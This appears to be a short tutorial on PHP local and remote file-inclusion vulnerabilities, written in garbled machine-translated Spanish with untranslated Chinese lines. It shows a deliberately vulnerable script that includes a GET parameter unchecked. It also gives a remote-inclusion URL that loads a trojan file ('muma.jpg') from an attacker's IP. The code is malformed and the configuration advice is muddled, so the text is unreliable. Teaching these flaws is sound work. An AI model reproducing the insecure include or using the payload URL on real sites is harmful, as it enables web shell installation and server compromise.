El archivo contiene una descripción general de las vulnerabilidades y una demostración de clasificación.
Contiene una introducción a la vulnerabilidad.
Operaciones de inclusión, funciones que se proporcionan en la mayoría de los lenguajes web, pero PHP es demasiado potente y flexible para incluir archivos, por lo que las vulnerabilidades de inclusión a menudo aparecen en el lenguaje PHP, lo que conduce a un statu quo incorrecto. Muchos principiantes creen que las vulnerabilidades de inclusión solo aparecen en el lenguaje PHP, pero no saben que las vulnerabilidades de inclusión pueden ocurrir en otros idiomas. Este también es un viejo dicho: cuanto más poderosa es la función, más lagunas existen.
Motivo de la vulnerabilidad.
包含漏洞不是语言的问题,而是人的思维问题
Cuatro incluyen funciones de archivo en PHP
include()
include_once()
require()
require_once()
做代码审计,应该着重找这几个函数
原因就是这几个函数的参数值都会当做php文件解析
PHP contiene clasificación de vulnerabilidad
Contiene localmente LIF
即把函数后的参数修改成为服务器本地的文件
例如
main.php
<?p
include''$_GET[page]'';
?>
1.html
页面1
此时输入http://192.168.1.55:8080/include/main.php?page=1.html
就可以直接执行1.html了
注意配置文件php.ini需要allow_url_include=on 并且 magic_quotes_gpc=off
Inclusión remota
Es decir, el parámetro después de que la función se modifica a un archivo en el directorio del sitio web especificado por el atacante, que no es necesariamente el propio sitio del atacante ¿Cualquier sitio puede
ingresar directamente http://192.168.1.55:8080/include/main.php? page = IP del atacante / include / muma.jpg
